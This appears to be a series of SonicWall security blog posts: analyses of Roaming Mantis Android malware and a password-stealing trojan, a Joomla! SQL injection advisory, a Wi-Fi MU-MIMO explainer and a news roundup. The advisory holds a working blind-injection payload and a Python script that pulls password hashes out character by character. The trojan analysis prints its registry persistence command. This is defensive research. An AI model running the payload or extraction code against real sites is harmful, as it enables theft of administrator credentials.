Roaming Mantis attacks Android devices in Asia, likely behind OTP codes (May 8, 2018)

The SonicWall Capture Labs Threat Research Team observed another rampant Android threat targeted mainly at Asian countries. This malware campaign, coined Roaming Mantis, began spreading via hijacked router DNS settings.

Hijacking the DNS settings of a router lets attackers resolve a legitimate domain to a server they control, so users who visit the legitimate domain land on malicious websites. These websites can then push malicious payloads onto the visitor's device via pop-ups, and users typically trust the pop-ups because they appear to originate from the legitimate site. This technique was used to push malicious Android apps to victims and thereby spread further. In this blog we analyze a few such malicious apps belonging to the Roaming Mantis campaign.

Infection Cycle

Once the app is opened it reads a file named db from its /assets folder; this file is a Base64-encoded dex file:

It then Base64-decodes the contents of this file and saves the result locally as test.dex in an app folder named "a":

Later it loads this file using DexClassLoader. Apart from the above activity, the original classes.dex that is loaded as part of the app requests device administrator privileges:
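The unpacking sequence described above, reproduced as an added example (this is neither the sample's own code nor SonicWall's): read assets/db from the APK, Base64-decode it and confirm the result carries a DEX header before handing it to a disassembler. The APK is built in memory from constructed stand-ins; only the asset name, the Base64 encoding and the test.dex output name come from the analysis, and the header check is standard DEX format knowledge.

```python
import base64
import binascii
import io
import zipfile

DEX_MAGIC = b"dex\n"            # every DEX file begins with "dex\n" + 3-digit version + NUL
DEX_HEADER_SIZE = 0x70          # fixed header size from the DEX format


def staged_asset_present(apk_bytes: bytes, asset_name: str = "assets/db") -> bool:
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        return asset_name in apk.namelist()


def extract_staged_dex(apk_bytes: bytes, asset_name: str = "assets/db") -> bytes:
    """Return the decoded second-stage DEX carried as Base64 text in the given asset."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        if asset_name not in apk.namelist():
            raise FileNotFoundError(f"{asset_name} not present in APK")
        blob = apk.read(asset_name)
    try:
        dex = base64.b64decode(blob, validate=True)   # reject anything that is not clean Base64
    except binascii.Error as exc:
        raise ValueError(f"{asset_name} is not valid Base64: {exc}") from exc
    if not dex.startswith(DEX_MAGIC) or len(dex) < DEX_HEADER_SIZE:
        raise ValueError("decoded payload does not carry a DEX header")
    return dex


def dex_version(dex: bytes) -> str:
    """The three ASCII digits after the magic, e.g. '035'."""
    return dex[4:7].decode("ascii")


def build_sample_apk(include_asset: bool = True) -> bytes:
    """Constructed stand-in APK: a stub manifest, a stub classes.dex and the
    Base64 asset.  The payload is a fake DEX consisting of a magic plus a zeroed header."""
    fake_dex = DEX_MAGIC + b"035\x00" + b"\x00" * DEX_HEADER_SIZE
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<constructed/>")
        z.writestr("classes.dex", DEX_MAGIC + b"035\x00")
        if include_asset:
            z.writestr("assets/db", base64.b64encode(fake_dex))
    return buf.getvalue()


if __name__ == "__main__":
    dex = extract_staged_dex(build_sample_apk())
    with open("test.dex", "wb") as out:     # same file name the sample uses for its dropped stage
        out.write(dex)
    print(f"recovered {len(dex)} bytes, DEX version {dex_version(dex)}")
```

Against a real sample, point extract_staged_dex at the APK bytes; a failed magic check usually means the asset is encrypted or obfuscated beyond plain Base64 and needs the decoding routine from classes.dex instead.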

From the set of samples we analyzed, each sample contacted one of the two domains listed below:

  • my.tv.sohu.com
  • baidu.com

We saw limited network activity during our analysis, which limited the behaviour the malware exhibited. Regardless, a number of malicious components present in the code (specifically in the decoded test.dex) showcase the capabilities of this threat:

Browser redirect

Once the test.dex file is decoded and loaded, the malware overlays the screen with an error message, likely chosen from the strings in the code below:

It then serves a spoofed Google authentication page from a web server it starts on the device on a random port. The page displays the user's account (obtained as described below) and asks for the user's name and date of birth. The malware reads the accounts registered on the device and shows them on the spoofed page to make it look authentic:

The image above shows the malware enumerating the accounts present on the device (Google and Twitter in our case) and using them to its advantage.

Values verification codes/OTP codes

Close inspection of one of the error messages from the previous point shows how much importance this app gives to verification codes. The complete error message is stored in parts; the interesting ones are:

  • Account No.exists risks, use after certification
  • Find the new version, please use after updating
  • "Would you like to grant this permission to " + b + "?" and "After opening the permissions, \"" + b + "\" will be able to access the web page more quickly, and enhance the phone's Internet experience"
  • 구글 계정이 이상이 있습니다. 음성검증을 들어 인증번호를 입력하여 구글 계정을 검증하도록합니다. 아니면 정상사용에 영향을 끼칠 것입니다. – Translation – There is a problem with your Google account. Listen to the voice verification and enter the verification number to verify your Google account. Otherwise it will affect normal use.
  • 인증번호 – Translation – Verification number
  • 인증번호를 입력하세요 – Translation – Please enter your verification number

Monitor apps

The malware monitors the presence of certain hardcoded apps on the device, including:

  • Banking apps – com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking
  • MMORPG games – com.ncsoft.lineagem, com.nexon.axe, com.nexon.nxplay
  • OTP apps – kr.co.neople.neopleotp, com.atsolution.android.uotp2

As highlighted above this malware keeps an eye on OTP apps.

Dangerous permissions requested

This malware requests a number of dangerous permissions at installation. A few of them stand out because they correlate with stealing verification codes/OTPs:

  • Send SMS (SEND_SMS)
  • Read SMS (READ_SMS)
  • Receive MMS (RECEIVE_MMS)
  • Receive SMS (RECEIVE_SMS)
  • Record audio (RECORD_AUDIO)

RECEIVE_SMS and READ_SMS together let the app intercept codes delivered by text message, and RECORD_AUDIO matches the "voice verification" wording of the spoofed Google prompt above.

Network communication

As mentioned earlier, each sample carries one hard-coded domain name (out of the two seen in this campaign). For each hard-coded domain it contains specific user accounts; for baidu.com, for instance, the following user accounts are present (separated by a "|"):

  • haoxingfu88
  • haoxingfu12389
  • wokaixin158998

The only network communication we saw during our analysis was GET requests from the malware to a specific user profile on baidu:

Hidden code

The malware contains an interesting piece of code as shown below:

Correlating this with the user accounts present in the code explains its purpose: the malware uses the string as a search pattern and extracts the data that follows it on the web page:

The data present on the web page after the search pattern is – 傀傸傸偠傠傠傠偘傀傠偘傰傸傈僨傀僨僸傸傀

Upon correlating the characters one by one with a Unicode chart we obtained the following:

  • 80B8B860A0A0A05880A058B0B888E880E8F8B880

We did not see further network activity during our analysis, as a result we could not ascertain what happens once this code is extracted or the significance of this code.
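One way to reproduce the conversion above in code, as an added example that is neither the sample's code nor SonicWall's: every character in the extracted string lies between U+5080 and U+50F8, and keeping the low byte of each code point yields exactly the hex string listed, so the function below pulls the run of such characters that follows a marker and applies that mapping. The marker string and the surrounding page body are constructed stand-ins (the real search pattern is whatever the sample carries); what the resulting bytes mean remains unknown, as stated above.

```python
import re


def decode_cjk_bytes(encoded: str) -> bytes:
    """Map each U+50xx character to the low byte of its code point."""
    out = bytearray()
    for ch in encoded:
        cp = ord(ch)
        if not 0x5000 <= cp <= 0x50FF:
            raise ValueError(f"unexpected character {ch!r} (U+{cp:04X})")
        out.append(cp & 0xFF)
    return bytes(out)


def extract_after_marker(page: str, marker: str) -> str:
    """Return the run of U+50xx characters that directly follows the marker."""
    m = re.search(re.escape(marker) + r"\s*([\u5000-\u50ff]+)", page)
    if not m:
        raise ValueError("search pattern not found in page")
    return m.group(1)


def resolve(page: str, marker: str) -> str:
    """Marker-delimited CJK string -> upper-case hex of the decoded bytes."""
    return decode_cjk_bytes(extract_after_marker(page, marker)).hex().upper()


# Constructed stand-ins: the marker is invented and the profile body is a stub;
# only the CJK string itself is the one observed on the baidu profile page.
MARKER = "##mantis##"
OBSERVED = "傀傸傸偠傠傠傠偘傀傠偘傰傸傈僨傀僨僸傸傀"
PAGE = f'<html><body><div class="profile">haoxingfu88</div><p>{MARKER}{OBSERVED}</p></body></html>'


if __name__ == "__main__":
    print(resolve(PAGE, MARKER))
```

The range check is deliberate: a dead-drop resolver that silently accepts characters outside the expected block would decode unrelated page text into plausible-looking bytes.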

Communication via SMTP

The malware contains code indicating that it can communicate with the attacker over SMTP. The code below shows how it can send an email with "new information" about the infected device:

Root check

The malware contains code that checks whether the device is rooted. We did not see any specific action taken depending on whether the device is rooted or not:

Targeted attack

Several things in the code indicate that this malware is targeted at users in Asia, and Korea in particular:

  • Korean-language strings appear in a number of places in the code
  • Several of the banking apps targeted are Asian: Woori Bank, Shinhan Bank
  • The MMORPG games and OTP apps are Asian as well: AxE, Neople OTP
  • Both domains, my.tv.sohu.com and baidu.com, are registered in Beijing and serve regional content

Hard-coded commands

The malware appears to contain a number of hard-coded commands:

Overall this malware campaign appears to be targeted towards Asian countries. Apart from its capability to harvest sensitive information from the infected device, it is particularly interested in OTP verification codes. The current set of samples target Banking and Gaming apps for their OTP codes but this can change to other types of apps as well.

Sonicwall Capture Labs provides protection against this threat with the following signatures:

  • AndroidOS.Banker.MNT
  • AndroidOS.Banker.DX

Following are apps that were targeted in the samples we analyzed:

  • com.wooribank.pib.smart
  • com.kbstar.kbbank
  • com.ibk.neobanking
  • com.sc.danb.scbankapp
  • com.shinhan.sbanking
  • com.hanabank.ebk.channel.android.hananbank
  • nh.smart
  • com.epost.psf.sdsi
  • com.kftc.kjbsmb
  • com.smg.spbs
  • com.webzen.muorigin.google
  • com.ncsoft.lineagem19
  • com.ncsoft.lineagem
  • kr.co.neople.neopleotp
  • kr.co.happymoney.android.happymoney
  • com.nexon.axe
  • com.nexon.nxplay
  • com.atsolution.android.uotp2

Following are the MD5s of some of the samples we analyzed for this threat:

  • 03108e7f426416b0eaca9132f082d568
  • 1cc88a79424091121a83d58b6886ea7a
  • 2a1da7e17edaefc0468dbf25a0f60390
  • 31e61e52d38f19cf3958df2239fba1a7
  • 34efc3ebf51a6511c0d12cce7592db73
  • 4d9a7e425f8c8b02d598ef0a0a776a58
  • 808b186ddfa5e62ee882d5bdb94cc6e2
  • 904b4d615c05952bcf58f35acadee5c1
  • a21322b2416fce17a1877542d16929d5
  • 1bd7815bece1b54b7728b8dd16f1d3a9
  • 307d2780185ba2b8c5ad4c9256407504

What is MU-MIMO wireless technology?

Did you know that wireless technology dates back to the 19th century? Through the years, great inventors like Michael Faraday, Thomas Edison and Nikola Tesla helped mold the concepts and theories behind electromagnetic radio frequency (RF).

It wasn’t until 1997, however, that the first 802.11 technology was introduced, which is known as the 802.11 legacy standard today. Since then, each new standard either introduced new technology or significantly improved over an older one.

The same holds true for 802.11ac technology. 802.11ac Wave 1 offered a significant enhancement over its predecessor, 802.11n. 802.11ac Wave 1 provided higher channel bandwidth and a new modulation scheme, significantly increasing the max data rates.

The Wave 2 wireless standard

Technology is always being replaced and improved upon, and 802.11ac Wave 1 has been replaced by today's 802.11ac Wave 2. Multi-User Multiple Input Multiple Output (MU-MIMO), wider channels and more spatial streams (SS) than before make Wave 2 a step change. The theoretical maximum data rate under the Wave 2 standard is 6.9 Gbps with an 8SS AP; with a 4SS access point (AP) it is 3.5 Gbps.

Specs                  | 802.11n               | 802.11ac Wave 1 | 802.11ac Wave 2
Frequency band         | 2.4 GHz and 5 GHz     | 5 GHz           | 5 GHz
MIMO support           | SU-MIMO               | SU-MIMO         | MU-MIMO
Max channel width      | 40 MHz                | 80 MHz          | 160 MHz
Max spatial streams    | 4                     | 4               | 8
Modulation             | 64-QAM                | 256-QAM         | 256-QAM
Beamforming            | implicit and explicit | explicit        | explicit
Backward compatibility | 11a/b/g               | 11a/b/g/n       | 11a/b/g/n
Max data rate          | 600 Mbps              | 1.7 Gbps        | 6.9 Gbps

Compare the evolution of wireless capabilities from 802.11n to today’s Wave 2 standard.

What is MU-MIMO and how is it different from SU-MIMO?

MU-MIMO is a Wave 2 technology. With Single User Multiple Input Multiple Output (SU-MIMO), the AP talks to only one client at a time. With MU-MIMO, the AP can transmit to up to four devices at a time in the downstream direction.

Talking to more devices in a single transmission decreases airtime, increases efficiency and delivers a better user experience. For MU-MIMO to work, both the AP and the client must support the technology. Since the 11ac Wave 2 technology is backwards-compatible, if the Wave 2 AP has to transmit to a Wave 1 device it will fall back to the Wave 1 technology and use SU-MIMO to transmit.

MU-MIMO improves wireless speed, performance

Faster data transmission with MU-MIMO improves efficiency and ensures more airtime for all clients.  802.11ac Wave 2 enhancements lead to faster data rates, providing higher throughputs, better performance and user experience.

With a 4SS AP operating on a 160 MHz channel and sending data to a 3SS client device, the maximum data rate that can be achieved is 2.6 Gbps. This is the theoretical maximum. For reference, the latest Apple MacBook Pro is a 3SS 802.11ac Wave 1 device, the MacBook Air is a 2SS 802.11ac Wave 1 device and the Galaxy S3 is a 1SS 802.11ac Wave 1 device.

Overall, MU-MIMO increases network capacity and throughput. This allows the wireless network to meet the rising demand for data-hungry applications. Since the wireless access point can talk to multiple devices at the same time, the number of devices in the queue decreases, resulting in reduced wait time and latency. Increase in the overall network capacity and reduced latency benefits not just the Wave 1 and Wave 2 devices, but also the legacy clients. More than one client is needed to take advantage of MU-MIMO.

AP configuration | 1SS client | 2SS client | 3SS client | 4SS client
4SS, 80 MHz      | 433        | 867        | 1300       | 1733
4SS, 160 MHz     | 867        | 1733       | 2600       | 3466

Wave 2 access point data rates in Mbps with different client types.
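How the numbers in both tables come about, as an added example not taken from the original post: the peak 802.11n/ac PHY rate is data subcarriers times bits per subcarrier times coding rate times spatial streams, divided by the symbol time. The subcarrier counts and the 3.6 µs short-guard-interval symbol are the standard's values; the 3466 in the table above is the same 3466.7 result truncated rather than rounded.

```python
# OFDM data subcarriers per channel width (802.11n for 20/40 MHz, 802.11ac for 80/160 MHz)
DATA_SUBCARRIERS = {20: 52, 40: 108, 80: 234, 160: 468}
SYMBOL_US = 3.2 + 0.4        # OFDM symbol plus short guard interval, in microseconds


def phy_rate_mbps(streams: int, width_mhz: int, bits_per_tone: int = 8, code_rate: float = 5 / 6) -> float:
    """Peak PHY rate = data tones x bits per tone x code rate x streams / symbol time.
    Defaults are 256-QAM rate 5/6 (VHT MCS 9); 802.11n tops out at 64-QAM (6 bits per tone)."""
    bits_per_symbol = DATA_SUBCARRIERS[width_mhz] * bits_per_tone * code_rate * streams
    return bits_per_symbol / SYMBOL_US          # bits per microsecond is Mbit/s


def client_rate_mbps(ap_streams: int, client_streams: int, width_mhz: int) -> float:
    """A client never gets more streams than it has radios; the AP count is only a ceiling."""
    return phy_rate_mbps(min(ap_streams, client_streams), width_mhz)


def rate_table(ap_streams: int, width_mhz: int) -> dict:
    """Rounded per-client rates for 1..ap_streams stream clients, as in the table above."""
    return {n: round(client_rate_mbps(ap_streams, n, width_mhz)) for n in range(1, ap_streams + 1)}


if __name__ == "__main__":
    for width in (80, 160):
        print(f"4SS AP, {width} MHz:", rate_table(4, width))
    print("802.11n 4SS, 40 MHz, 64-QAM:", round(phy_rate_mbps(4, 40, bits_per_tone=6)), "Mbps")
    print("802.11ac 8SS, 160 MHz:", round(phy_rate_mbps(8, 160)), "Mbps")
```

These are PHY rates; real throughput is lower because of preambles, acknowledgements, contention and the fact that MU-MIMO groups only form when enough compatible clients have traffic queued.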

What happens during MU-MIMO transmission?

A MU-MIMO-capable AP sends a sounding signal to the client devices in the network. Each of the clients sends back a Channel State Information (CSI) based on the information it receives from the sounding signal. The AP calculates the phase and signal strength based on the CSI it receives from each client and selects the MU-MIMO-capable devices that can be grouped in one transmission.

Does MU-MIMO rely on any external factors?

Yes, MU-MIMO relies heavily on multipath and beamforming. Multipath is the process of two or more signals reaching the client at the same time or within nanoseconds of each other. Multipath happens due to RF barriers like walls, metal surfaces and concrete that cause the signals to reflect, refract, etc. Beamforming, however, directs the signal in the direction of the client.

Is it the right time to buy 802.11ac Wave 2 or should I wait for 802.11ax?

According to multiple analyst sources, the Wi-Fi market is not slowing down. For instance, IHS forecasts 11ac Wave 2 technology to increase 12 percent annually for the next three years. There are a number of Wave 2-capable devices in the market today and this will increase in the near future.

Should you wait for 802.11ax? The answer is simple: no. You are looking at a couple of years for the full-fledged adoption of 11ax products. The standard in itself is expected to be ratified in late 2019 after which it needs to pass interoperability testing by Wi-Fi Alliance.

Once manufacturers release 11ax-capable APs that are certified by the Wi-Fi Alliance, mainstream adoption will occur, which is expected to be around 2020. At the same time, 11ax-capable client devices are required to reap the full benefits of the 11ax network. For the next couple of years, 11ac Wave 2 technology will remain the next-gen wireless connectivity standard.

Where can I buy Wave 2 wireless access points?

SonicWall SonicWave Wave 2 access points (432i/432e/432o 802.11ac) provide all the benefits of Wave 2 technology. You can expect superior performance and reliability with these access points. MU-MIMO technology enables SonicWave 400 series access points to transmit to up to four devices at the same time.

To implement best practices in wireless networking and wireless security, download our complimentary technical brief, “SonicWall Wireless Network Security.” Learn how SonicWall wireless network security solutions can alleviate performance and security concerns, enabling you to extend your business network without jeopardizing its integrity.

Password stealer sends data to a remote FTP server

The SonicWall Capture Labs Threat Research Team has observed a Trojan that drops its own FTP client, crafted to connect to a hardcoded remote FTP server and upload stored password information stolen from the victim's machine. It also drops a series of scripts that run in succession to carry out the infection.

Infection Cycle:

The Trojan purports to be a PDF file using the following icon:

Figure 1: Icon used by the Trojan

Upon execution this Trojan opens an empty jpg file using a photo editor which then throws an error as shown in the figure below:

Figure 2: Microsoft Photo editor error when opening an empty image file

It creates a subdirectory named "AdobeRead" under "Adobe\Adobe Inc" in the %APPDATA% directory and drops the following files there:

  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\adbr01.exe  [detected as GAV: Stealer.PASS (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\adbr02.exe [detected as GAV: Stealer.PASS (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\870.afr (ftp commands and credentials)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\sun.afr (ftp commands and credentials)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\abb1.bat [detected as GAV: Adob.BAT (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\hvv02.bat [detected as GAV: Adob.BAT_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\hvv03.bat [detected as GAV: Adob.BAT_3 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\Adob9.vbs [detected as GAV: Adob.VBS_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\istart.vbs  [detected as GAV: Adob.VBS_4 (Trojan)]
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\BReader.exe (a non-malicious sleep module)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\245.jpg  (this is the empty JPG file)
  • %APPDATA%\Adobe\Adobe Inc\AdobeRead\Adobeta.exe [detected as GAV: Fake.FTP (Trojan)]

The vbscript named istart.vbs is what starts the entire process. It runs the batch file named “hvv02.bat” which copies the files into the %APPDATA% directory as outlined above.

Figure 3: istart.vbs file stealthily runs hvv02.bat

Figure 4: hvv02.bat creates a copy of the rest of its malicious components

Hvv02.bat then runs another vbscript named “Adob9.vbs” which in turn runs hvv03.bat. This last batch file is responsible for running the rest of the executable files used to steal all stored password information and save them into a file. Its own FTP client named “Adobeta.exe” is used to connect to a remote server to send out all the information gathered.

Figure 5: Adob9.vbs which runs another batch file

Figure 6: hvv03.bat has all the commands to save and send all stolen data.

To ensure persistence, the Trojan adds a value under the HKCU Run key that launches a batch file to restart the whole chain at the next logon. The registry arguments it uses are:

  • "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "32455cent" /t REG_SZ /F /D "%appdata%\Adobe\Adobe Inc\AdobeRead\abb1.bat"

Figure 7: abb1.bat runs Adob9.vbs
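A way to hunt for this persistence across a fleet, as an added example that is not part of the original analysis: parse the output of reg query for the Run key and flag values that launch a script file or point into a user-writable profile location. The reg query text below is constructed; the value name 32455cent and the abb1.bat path are the ones reported above, while the list of user-writable locations and the severity labels are assumptions for illustration.

```python
import re

SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js", ".ps1")
# profile locations an unprivileged user can write to (assumed list for the example)
USER_WRITABLE = ("%appdata%", "%localappdata%", "%temp%", "\\appdata\\", "\\temp\\", "\\users\\public\\")
REG_LINE = re.compile(r"^\s*(?P<name>\S.*?)\s{2,}(?P<type>REG_\w+)\s{2,}(?P<data>.+?)\s*$")
FIRST_FILE = re.compile(r"^(.+?\.(?:exe|com|scr|bat|cmd|vbs|js|ps1))(?:\s|$)", re.IGNORECASE)


def parse_reg_query(text: str):
    """Yield (value name, type, data) from 'reg query <key>' output."""
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            yield m.group("name"), m.group("type"), m.group("data")


def launched_file(data: str) -> str:
    """The file a Run value launches: the quoted token if present, otherwise the text
    up to the first executable/script extension (unquoted paths may contain spaces)."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = FIRST_FILE.match(data)
    return m.group(1) if m else data.split(" ")[0]


def triage_run_keys(text: str) -> dict:
    """Map value name -> (launched file, severity) for values worth a look."""
    findings = {}
    for name, _type, data in parse_reg_query(text):
        path = launched_file(data)
        lowered = path.lower()
        in_user_dir = any(marker in lowered for marker in USER_WRITABLE)
        if lowered.endswith(SCRIPT_EXT):
            findings[name] = (path, "high")        # a script as an autostart target
        elif in_user_dir:
            findings[name] = (path, "review")      # binaries in profile dirs are common but worth a look
    return findings


# Constructed sample of 'reg query HKCU\...\Run' output with one legitimate
# profile-path entry, the value from this analysis, and one system entry.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    32455cent    REG_SZ    %appdata%\Adobe\Adobe Inc\AdobeRead\abb1.bat
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

if __name__ == "__main__":
    for name, (path, severity) in triage_run_keys(SAMPLE_REG_QUERY).items():
        print(f"{severity:6} {name:15} {path}")
```

On a live host, feed it the output of `reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"` and the HKLM equivalent; a "high" hit pointing under %APPDATA%\Adobe is exactly the artifact described here, and the dropped .afr files next to it hold the FTP destination and credentials.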

The files 870.afr and sun.afr contain the commands and credentials used to connect to the remote FTP server.

Figure 8: 870.afr and sun.afr

Below are the connections made to a remote server:

Figure 9: First connection made

Figure 10: Second connection made using different credentials

The report files "Email Password Recovery Report" and "Browser Password Recovery Report", along with the victim machine's IP configuration, are saved within the same %APPDATA% directory following the naming convention set by the hvv03.bat file.

Figure 11: Sample Password recovery report

SonicWall Capture Labs provides protection against this threat with the following signatures:

  • GAV: Stealer.PASS (Trojan)
  • GAV: Adob.BAT (Trojan)
  • GAV: Adob.BAT_3 (Trojan)
  • GAV: Adob.BAT_4 (Trojan)
  • GAV: Fake.FTP (Trojan)

Joomla! User Notes SQL Injection

Joomla! is a free and open source content management system (CMS) used for building websites and for publishing web content. It is estimated to be the second most used content management system on the Internet after WordPress.

An SQL injection vulnerability exists in the Joomla! com_users component due to insufficient validation of the "category_id" filter value. The component is reached through the following URI:

/administrator/index.php?option=com_users&view=notes

The method getListQuery() in the com_users component builds an SQL SELECT query that lists the user notes matching the filters passed in the HTTP request. One such filter key is category_id, and its value is placed into the SQL query without proper validation. A malicious user can therefore craft an HTTP request whose category_id value changes the constructed query to perform operations the programmer never intended. Successful exploitation can disclose sensitive information, tamper with existing data or execute administrative operations on the database.

An example of a crafted HTTP request to a vulnerable server is given below; the filter is sent as a POST body parameter:

POST /joomla/administrator/index.php?option=com_users&view=notes HTTP/1.1
filter%5Bcategory_id%5D=7+AND+ascii(substring((SELECT+concat(1,password,0x2F)+from+#__users+limit+0,1),2,1))>31&

URL-decoded, the filter value reads:

filter[category_id]=7 AND ascii(substring((SELECT concat(1,password,0x2F) from #__users limit 0,1),2,1))>31

This is a boolean-based blind injection. The comparison against the ASCII value of one character of a password hash from the #__users table (the "#__" prefix is replaced by the site's configured table prefix) either leaves the note listing intact or empties it, and the attacker reads the answer from that difference one character at a time; the literal 1 prepended by concat() shifts the hash to position 2 and the 0x2F ("/") marks its end.
This can be mitigated by upgrading to the latest non-vulnerable version of the software.
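The blind extraction the request above relies on, and the input check that defeats it, as an added example that is neither Joomla's code nor the original advisory's. SQLite's unicode() stands in for MySQL's ascii(), the local tables users and notes stand in for #__users and the user-notes table, the column names and the hash value are constructed, and the hardened builder shows the simplest adequate fix for an integer filter: cast before it reaches SQL.

```python
import sqlite3


def build_query_vulnerable(category_id: str) -> str:
    """The weakness the advisory describes: the filter value is pasted into the WHERE clause."""
    return f"SELECT id, subject FROM notes WHERE catid = {category_id}"


def build_query_hardened(category_id: str) -> str:
    """A category id is an integer; anything else is rejected before it reaches SQL."""
    return f"SELECT id, subject FROM notes WHERE catid = {int(category_id)}"


def hardened_rejects(category_id: str) -> bool:
    try:
        build_query_hardened(category_id)
    except ValueError:
        return True
    return False


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the Joomla tables, with one admin row and one note."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        CREATE TABLE notes (id INTEGER, catid INTEGER, subject TEXT);
        INSERT INTO users VALUES (42, 'admin', '$2y$10$constructedhashvalue');
        INSERT INTO notes VALUES (1, 7, 'first note');
    """)
    return conn


def oracle(conn: sqlite3.Connection, filter_value: str) -> bool:
    """All the attacker observes: whether the filtered listing still returns rows."""
    return len(conn.execute(build_query_vulnerable(filter_value)).fetchall()) > 0


def extract_password(conn: sqlite3.Connection, max_len: int = 64) -> str:
    """Boolean-based blind extraction with the advisory's comparison shape,
    unicode(substr(...)) > N standing in for MySQL's ascii(substring(...)) > N.
    concat(1, password, 0x2F) prepends '1' and appends '/', so the hash starts
    at position 2 and the '/' marks its end."""
    recovered = []
    for pos in range(2, max_len + 2):
        lo, hi = 0, 127                       # binary search over the character value
        while lo < hi:
            mid = (lo + hi) // 2
            probe = ("7 AND unicode(substr((SELECT '1' || password || '/' FROM users LIMIT 1), "
                     f"{pos}, 1)) > {mid}")
            if oracle(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        if chr(lo) == "/":
            break
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable builder leaks:", extract_password(db))
    print("hardened builder rejects payload:", hardened_rejects("7 AND 1=1"))
```

Seven probes per character is all the oracle needs, which is why the WAF signatures listed below key on the ascii/substring comparison pattern rather than on any particular table name.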
 
The SonicWall Threat Research Team has the following signatures to protect customers:

  • IPS 13316: Joomla! User Notes SQL Injection
  • WAF 1001: Blind SQL Injection Attack Variant 5
  • WAF 9002: Blind SQL Injection Attack Variant 1
  • WAF 9004: Blind SQL Injection Attack Variant 3
  • WAF 9006: SQL Injection Attack 2
  • WAF 9045: SQL Injection Attack 11

Cyber Security News & Trends – 05-04-18

Each week, SonicWall collects the cyber security industry’s most compelling, trending and important interviews, media and news stories — just for you.

SonicWall Spotlight

FBI Calls Attention to 'BEC' Scams (CRN)

  • In an article detailing the rise of BEC scams by the FBI, SonicWall President and CEO Bill Conner is quoted for his insight on the issue noting that technology such as DPI SSL can help as a preventative to potential breaches.

A Bitcoin Podcaster Brilliantly Trolled His Own Hacker (The Verge)

  • A podcaster's web domain was hijacked and held for ransom by remote attackers. Ransomware data from SonicWall's 2018 Cyber Threat Report was cited.

Bringing Visibility to the Midmarket (Data Breach Today)

  • In a video interview with ISMG’s Data Breach Today, SonicWall’s Bill Conner shares his vision to ensure smaller and mid-sized businesses have a clear view of the threat landscape taking aim at their companies. In the video he expands on the SME visibility challenge, SonicWall’s solutions to improve alerts and analytics and how SonicWall is addressing customer cloud security concerns.

Jonesboro Council Tackles Cybersafety (The Clayton News Daily)

  • Following the recent Atlanta cyberattack, other cities are taking the initiative to bolster their preventive cybersecurity measures, among them Georgia's Jonesboro City Council, which recommended SonicWall's TZ300 firewall to protect the city's financial data.

Cyber Security News

North Korea's Antivirus Software Whitelisted Mystery Malware (The Register)

  • North Korea’s very own antivirus software has been revealed to be based on a 10-year-old application made by Trend Micro, but with added nasties.

Commonwealth Bank Lost Data on Nearly 20M Customers (ZDNet)

  • The Commonwealth Bank of Australia (CBA) is unsure of where data on millions of customers has gone, after it was revealed that magnetic tapes comprising information used to print account statements may not have been properly disposed of.

Breaches Drive Consumer Stress Over Cybersecurity (Dark Reading)

  • As major data breaches make headlines, consumers are increasingly worried about cyberattacks, password management, and data security.

This Password-Stealing Malware Uses Facebook Messenger to Spread Further (ZDNet)

  • A form of malware which uses fake Facebook Messenger messages to spread has suddenly surged back into life and has developed new tricks to steal passwords, steal cryptocurrency and engage in cryptojacking.

House Appropriations Panel Should Step Up Cyber Oversight, Member Urges (Nextgov)

  • Dutch Ruppersberger, D-Md., sent out a report Monday outlining key areas the panel should focus on, including the threat of adversary nations stealing U.S. government hacking tools, cyber threats against industrial control systems that manage chemical and gas plants and ways to surge information sharing about cyber threats within industry sectors.


Upcoming Webinars & Events

May 8
Webinar
11 a.m. PDT
Under the Hood: How to Responsibly Decrypt & Inspect Encrypted Traffic

IoT & Mobile Threats: What Does 2017 Tell Us About 2018?

“SPARTANS! Ready your breakfast and eat hearty. For tonight, WE DINE IN HELL!!”

Remember this passionate line by King Leonidas from the movie “300”? We are at the brink of another war — the modern cyber arms race. You need to gear up and be prepared for the thousands of malicious “arrows” that shoot down on you.

This cyber arms race is aimed against governments, businesses and individuals alike, and it’s comprised of different types and forms of cyber attacks. These attacks grow more sophisticated each year, with over 12,500 new Common Vulnerabilities and Exposures (CVE) reported in 2017 — 78 percent of which were related to network attacks.

It’s critical we learn from the past experiences — successes and failures. So, what can 2017 teach us to be better prepared in 2018? Let’s first look at the hard data.

According to the 2018 SonicWall Cyber Threat Report, SonicWall Capture Labs detected 184 million ransomware attacks and a 101.2 percent increase in new ransomware variants from more than 1 million sensors across more than 200 countries. The increase in new variations signifies a shift in attack strategies.

